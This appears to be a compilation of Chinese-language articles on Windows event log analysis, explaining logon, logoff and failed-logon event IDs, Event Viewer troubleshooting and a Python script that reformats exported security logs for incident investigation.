很多时候我们需要详细分析描述字段中的信息,这部分出现的信息也会随具体的事件⽽不同,但是其形式都是为⼀系列组合信息,每个组合信息是⼀个内容固定的描述信息(类似占位符的作⽤),以及后⾯的动态信息。
举个例⼦来说:ID680事件的描述字段包括:“Logon account: Administrator”。
Windows系统的系统日志分析与故障定位
Windows系统的系统日志分析与故障定位在使用Windows操作系统时,系统日志是一项重要的工具,可以帮助我们分析和解决系统故障。
本文将介绍如何利用系统日志进行分析和定位故障的方法和步骤。
一、什么是系统日志系统日志是Windows操作系统记录系统事件和错误的一种机制。
它可以记录关键信息,如错误代码、警告信息、应用程序崩溃等。
系统日志位于事件查看器中。
二、系统日志分析的步骤1. 打开事件查看器:在Windows系统中,可以通过按下Win键+R 组合键,然后输入"eventvwr.msc"来打开事件查看器。
2. 查看系统日志:在事件查看器中,找到"Windows日志",然后展开,可以看到包括应用程序、安全性、系统等不同类型的日志。
3. 过滤和筛选日志:根据需要,可以使用筛选功能来过滤日志。
例如,如果只要查看系统错误,可以通过选择"系统"日志并应用筛选条件来筛选。
4. 查看错误详细信息:在选定的日志中,可以查看每个事件的详细信息。
这些信息包括事件ID、日志级别、源、描述等。
5. 解读错误信息:根据错误描述、事件级别以及其他相关信息,进行错误分析。
可以通过搜索错误代码或描述来获取更多相关信息。
6. 寻找解决方案:根据错误信息,搜索互联网上的解决方案或参考Microsoft官方文档、技术支持等资源,找到解决方案。
三、常见的系统日志故障与解决方法1. 系统启动故障:如果系统无法启动,可以查看"系统"日志以了解引起启动问题的可能原因,例如硬件故障、驱动程序冲突等。
2. 应用程序崩溃:如果某个应用程序频繁崩溃,可以查看应用程序特定的日志,并注意错误代码和描述。
可能的解决方案包括重新安装应用程序、更新驱动程序等。
3. 网络故障:如果网络连接遇到问题,可以查看"系统"日志中的网络适配器、DHCP等相关信息。
根据错误代码和描述,尝试重新启动网络适配器、重新配置IP等操作。
windows安全日志分析
window安全日志分析今日服务器遭受入侵,入侵路径回溯:被入侵服务器->跳板机->办公网某主机。
因此整理记录windows被入侵相关信息。
本文只研究windows安全登录相关日志,介绍三种事件类型(登录,注销,尝试登陆)。
通过此日志可查看windows主机是否通过3389远程服务爆破进入。
注:windows日志有存储大小限制,有被覆盖的可能。
可修改,请自行百度。
1.1 windows日志位置我的电脑右键管理:刷选windows安全日志事件ID:4000-4700,登录相关1.2 三种登录事件详解1.2.1 事件4648(尝试登陆)事件4648描述:此事件发生在日志所在windows主机,表明日志所在windows主机尝试连接远程主机,无论连接成功与否,这里都会记录。
网络地址端口:经测试发现只有同一局域网(且同一C段)才会记录目标服务器ip端口。
1.2.2 事件4624(登陆成功)事件4624描述:表示日志所在win主机被成功连接“使用者”:指明本地系统上请求登录的帐户。
这通常是一个服务(例如Server 服务)或本地进程(例如Winlogon.exe 或Services.exe)。
“登录类型”:指明发生的登录种类。
最常见的类型是2 (交互式)和3 (网络)。
(登陆类型3:例如连接共享文件,打印机等;登陆类型7:解锁;登陆类型10:例如远程桌面等参考连接:/s/blog_5c39a08901012uu5.html)“新登录”:指明新登录是为哪个帐户创建的,即登录的帐户。
“网络信息”:指明远程登录请求来自哪里。
“工作站名”并非总是可用,而且在某些情况下可能会留为空白。
1.2.3 事件4634(注销)1.3 日志分析工具log_parser_lizard工具介绍:一个Log Parser的图形版,功能强大(可能需要安全相关依赖,我一开始安装了Log Parser)使用参考连接: /post/2012/03/26/Useful-tool-Log-Parser-Lizard-GUI.aspx下载地址:https:///lizardlabsdataUS/LogParserLizardSetup.msi获取15天免费key,需要注册邮箱:https:///forms/d/e/1FAIpQLSeB09sSTV_kxMpHcWpxp5CFBFh_fE8SRRKm2E F0v3Chsk_3fA/viewform工具界面:执行查询:我这里把相关安全日志单独copy一份,下面是我执行的语句:相应字段:执行结果:strings难以查看,导出excel后,使用python处理了一下:#! /usr/bin/python# _*_ coding:utf-8 _*_import xlrdimport xlwtimport timeworkbook = xlrd.open_workbook('zhangsan.xlsx')sheet = workbook.sheets()[0]nrows = sheet.nrowsncols = sheet.ncolsworkbook1 = xlwt.Workbook()sheet1 = workbook1.add_sheet('my sheet')sheet1.write(0, 0, u'时间')sheet1.write(0, 1, u'事件ID')sheet1.write(0, 2, u'事件类型')sheet1.write(0, 3, u'描述')for i in range(1, nrows):row = sheet.row_values(i)timegenerated = xlrd.xldate_as_tuple(row[0], 0)timegenerated = '{}/{}/{} {}:{}:{}'.format(timegenerated[0], timegenerated[1], timegenerated[2], timegenerated[3], timegenerated[4], timegenerated[5])eventid = int(row[1])string = str(row[2]).split('|')if eventid == 4648:event_type = u'尝试登录'account_name01 = string[1]account_domain01 = string[2]account_name02 = string[5]account_domain02 = string[6]destination_servername01 = string[8]ip_addr01 = string[12]result = u'使用者:{}:{},凭证:{}:{},目标服务器:{},网络信息:{}'.format(account_name01, account_domain01, account_name02, account_domain02,destination_servername01,ip_addr01)elif eventid == 4624:event_type = u'登录成功'account_name11 = string[1]account_domain11 = string[2]account_name12 = string[5]account_domain12 = string[6]login_type11 = string[8]workstation11 = string[11]ip_addr11 = string[18]result = u'使用者:{}:{},登录用户:{}:{},登录类型:{},网络信息:{}:{}'.format(account_name11, account_domain11, account_name12, account_domain12, login_type11,workstation11, ip_addr11)elif eventid == 4634:event_type = u'注销'account_name21 = string[1]account_domain21 = string[2]login_type21 = string[4]result = u'使用者:{}:{},登录类型:{}'.format(account_name21, account_domain21, login_type21)else:result = string# print i, timegenerated, eventid, resultsheet1.write(i, 0, timegenerated)sheet1.write(i, 1, eventid)sheet1.write(i, 2, event_type)sheet1.write(i, 3, result)workbook1.save('zhanghang.xls')最终处理结果如下:希望此文可以给关注windows主机的同学提供一些新的思路。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Windows日志浅析总体来看,登录/登出事件对可以很好地追踪用户在一台主机上完整活动过程的起至点,和登录方式无关。
此外可以提供一些“帐户登录”没有的信息,例如登录的类型。
此外对终端服务的活动专门用两个事件ID来标识。
ok,我们开始分析,同样从5种类型分别进行分析。
1、本地方式的登录和登出Randy大神在书中只提到了Windows使用两个事件ID528和540记录用户成功的登录(后者对应网络类型的登录),登出使用ID530。
然而事实上同时发生的事件不只限于这些,那么让我们来看看用户简单的登录和登出活动至少会触发那些事件。
首先是成功的登录,从日志分析来看至少会有2个事件发生,分别为ID552和528,以下从左到右分别是各自的截图。
现在来各种进行详细分析,首先是ID552事件,该事件说明有人使用身份凭据在尝试登录,并且头字段中的用户名为SYSTEM。
看看描述信息中有什么好东西:使用明确凭据的登录尝试: (说明有人在尝试登录)登录的用户:用户名: WIN2003$ (主机名加了$后缀)域: WORKGROUP (主机的域名,此例中主机在名称为“WORKGROUP”的工作组中)登录ID: (0x0,0x3E7)登录GUID: -凭据被使用的用户:目标用户名: Administrator (登录使用的用户名)目标域: WIN2003 (要登录的主机名)目标登录GUID: -目标服务器名称: localhost目标服务器信息: localhost调用方进程ID: 1612源网络地址: 127.0.0.1 (从IP地址很容易判断是本地登录)源端口: 0这里有一点要说明一下,Windows对这条日志的解释是“一个已登录的用户尝试使用另外一个用户凭证创建登录会话,例如使用“RUNAS”命令来运行某个可执行文件”。
但事实上第1次用户成功登录后也会产生这个事件。
接着是ID528事件,此时头字段中的用户名也变成真实的用户名,看看描述信息中有什么东西:登录成功: (说明用户已成功登录)用户名: Administrator (登录使用的用户名)域: WIN2003 (被登录主机所属的域的域名,如果不在域中为主机名)登录ID: (0x0,0x37BF9) (此登录ID在计算机重启前会保持其唯一性,重启后可能会被再次使用。
该ID很重要,因为可以关联用户随后的很多活动如对象访问!)登录类型: 2 (各种类型含义及数字见后面的表格)登录进程: User32身份验证数据包: Negotiate工作站名: WIN2003 (记录发起登录请求的计算机的Netbios名)登录GUID: -调用方用户名: WIN2003$调用方域: WORKGROUP调用方登录ID: (0x0,0x3E7) (注意,此ID和ID552事件描述信息的登录ID是一样的)调用方进程ID: 1612传递服务: -源网络地址: 127.0.0.1 (同样从IP地址很容易判断是本地登录)源端口: 0有意思的事情发生了,ID528事件的调用方登录ID和和ID552的登录ID是一样,那么我们能不能做个大胆的猜想呢?在本地登录成功前,系统本身先已创建了登录会话,然后此会话再创建真实的用户会话。
呵呵,只是随便猜猜而已。
登录类型对应含义如下表,上篇文章中常见5种登录方式对应数字分别为2、3、4、5、10。
此外,如果登录的用户名有某些权限(通过”本地安全策略“分配给该用户),在用户成功登录时还会有ID576事件发生,如下图所示:描述信息如下:指派给新登录的特殊权限:用户名: Administrator域: WIN2003登录ID: (0x0,0x37BF9)特权: SeSecurityPrivilegeSeBackupPrivilegeSeRestorePrivilegeSeTakeOwnershipPrivilegeSeDebugPrivilegeSeSystemEnvironmentPrivilegeSeLoadDriverPrivilegeSeImpersonatePrivilege从描述信息中我们可以看到名称为“Administrator”的用户所拥有的权限列表。
接下来看看失败的本地登录,首先是无效用户名、其次是有效用户名但是错误密码。
从图中可以看到,登录失败后会有ID529的事件产生。
并且两者头字段的信息没有什么区别,用户名都是“SYSTEM”。
那么看看描述信息中有什么信息和区别。
登录失败:原因: 用户名未知或密码错误用户名: test1域: WIN2003登录类型: 2登录进程: User32身份验证数据包: Negotiate工作站名称: WIN2003调用方用户名: WIN2003$调用方域: WORKGROUP调用方登录ID: (0x0,0x3E7)调用方进程ID: 1100传递服务: -源网络地址: 127.0.0.1源端口: 0登录失败:原因: 用户名未知或密码错误用户名: administrator域: WIN2003登录类型: 2登录进程: User32身份验证数据包: Negotiate工作站名称: WIN2003调用方用户名: WIN2003$调用方域: WORKGROUP调用方登录ID: (0x0,0x3E7)调用方进程ID: 1100传递服务: -源网络地址: 127.0.0.1源端口: 0从描述信息可以看到两者没有什么区别,唯一不同的是用户名,并且登录失败原因都一样。
登录类型同样给出了用户登录的方式,为本地登录(数字为2)。
有意思的是调用方用户名也是“主机名+$”的形式。
用户正常注销登出的话,也不是简单的一个事件。
事实上会有2个事件产生,ID分别为551和538。
截图如下:看来微软在这点做得够细致了,先会有ID551事件说明有用户要求注销,接着ID538事件说明用户已成功注销。
从头字段和描述信息中都可以看到真实的用户名,登录ID,并且ID538事件还包括用户的登录方式。
微软的官方解释中有这样的说明:“ID551事件说明用户发起注销请求,因此包含用户的安全信息和允许用户访问对象的主要访问令牌会从内存中擦除。
因此在令牌擦除后用户无法访问资源如文件、注册表。
当注销过程完成后ID538事件产生。
如果ID538事件没有在551事件后出现,一个程序或服务可能没有正确地管理访问令牌。
尽管用户无法访问对象,这个程序或服务可能有缓存的访问令牌并保留访问对象的能力”。
2、远程方式的登录和登出使用mstsc远程登录某个主机时,使用的帐户是普通用户的话(没有分配该用户任何权限)成功的情况下会有ID为552、528的事件产生,没有ID576事件。
这2个事件的头字段和本地方式基本没有什么区别,看看描述信息有什么不一样的地方:使用明确凭据的登录尝试:登录的用户:用户名: WIN2003$域: WORKGROUP登录ID: (0x0,0x3E7)登录GUID: -凭据被使用的用户:目标用户名: rdp目标域: WIN2003目标登录GUID: -目标服务器名称: localhost目标服务器信息: localhost调用方进程ID: 1984源网络地址: 192.168.10.2源端口: 1035登录成功:用户名: rdp域: WIN2003登录ID: (0x0,0x4C715)登录类型: 10登录进程: User32身份验证数据包: Negotiate工作站名: WIN2003登录GUID: -调用方用户名: WIN2003$调用方域: WORKGROUP调用方登录ID: (0x0,0x3E7)调用方进程ID: 1984传递服务: -源网络地址: 192.168.10.2源端口: 1035从这里可以看出至少有3个地方不一样,首先登录类型的ID为10,说明是远程交互式登录,其次是源网络地址和源端口。
如果有防火墙的日志的话,可以进行关联分析。
登录失败同样分别使用无效用户名和有效用户名、无效密码2种方式,结果都是产生ID529事件,与之前也没有什么区别。
描述信息如下:登录失败:原因: 用户名未知或密码错误用户名: rdp域: WIN2003登录类型: 10登录进程: User32身份验证数据包: Negotiate工作站名称: WIN2003调用方用户名: WIN2003$调用方域: WORKGROUP调用方登录ID: (0x0,0x3E7)调用方进程ID: 2640传递服务: -源网络地址: 192.168.10.2源端口: 1040从信息中可以看到,唯一不同且有价值的是登录类型的ID、源IP地址和源端口。
用户注销的话同样会有ID551和538事件产生,与本地登录一样(除了登录类型的数值),因此不再附图说明。
但是ID538事件产生时间会比551晚一点,做了几次实验有1分30秒、2分多都有,似乎不是固定的值。
如果使用RDP远程登录主机后,没有注销而是直接点×关闭窗口,会产生ID683事件,如果再次使用该用户和密码连接时,会产生ID682事件,截图分别如下:从描述信息中可以很清楚地看到会话中断和重新连接的事件,此时登录ID都一样,但是会话名称已经发生变化。
另外一种远程访问方式为远程协助,也会产生ID552、528、551和538事件(会伴随用户名为“ANONYMOUS LOGON”的成对ID540和538事件)。
只是其中的真实用户名变成“HelpAssistant_abae4f”,其中的“abae4f”不知道是不是随机生成,反正我做了2次实验都是这个。
3、网络访问的登录和登出这里访问共享文件夹的情况根据不同的情况会有几种不同的事件模式产生,分别进行说明。
这里先假设主机A上C盘目录下有名为“share”的文件夹,开启网络共享并且权限为A主机上的名为“rdp”的用户。
架设B主机上也有名为“Administrator”的管理员和名为“rdp”的用户。
a、没有给A主机上的”rdp“用户赋予任何权限,设置B主机的rdp用户和A主机上的密码一致,以rdp用户登录B主机,然后以在运行中输入“\\192.168.10.1\share”的方式访问A主机的共享文件夹,然后关闭共享文件夹窗口。
此时在A主机上会有事件模式为:有用户名为“rdp”的ID为540和538的事件产生(注意:此时登录时没有ID552事件),如下图所示:这些登录、登出事件的头字段中用户名均为rdp,但是计算机名还是被访问的主机名。
现在看看ID540事件的描述信息:成功的网络登录:用户名: rdp域: WIN2003登录ID: (0x0,0x75BCF)登录类型: 3登录过程: NtLmSsp身份验证数据包: NTLM工作站名: WIN2K3登录GUID: -调用方用户名: -调用方域: -调用方登录ID: -调用方进程ID: -传递服务: -源网络地址: 192.168.10.2源端口: 0从中我们可以发现除了登录类型变为“3”以为,身份验证数据包也变为“NTLM”,并且工作站的名称也是发出访问共享文件夹请求的B主机的真实主机名(这里让我很奇怪的是使用RDP方式访问时工作站名仍为被访问主机的主机名)。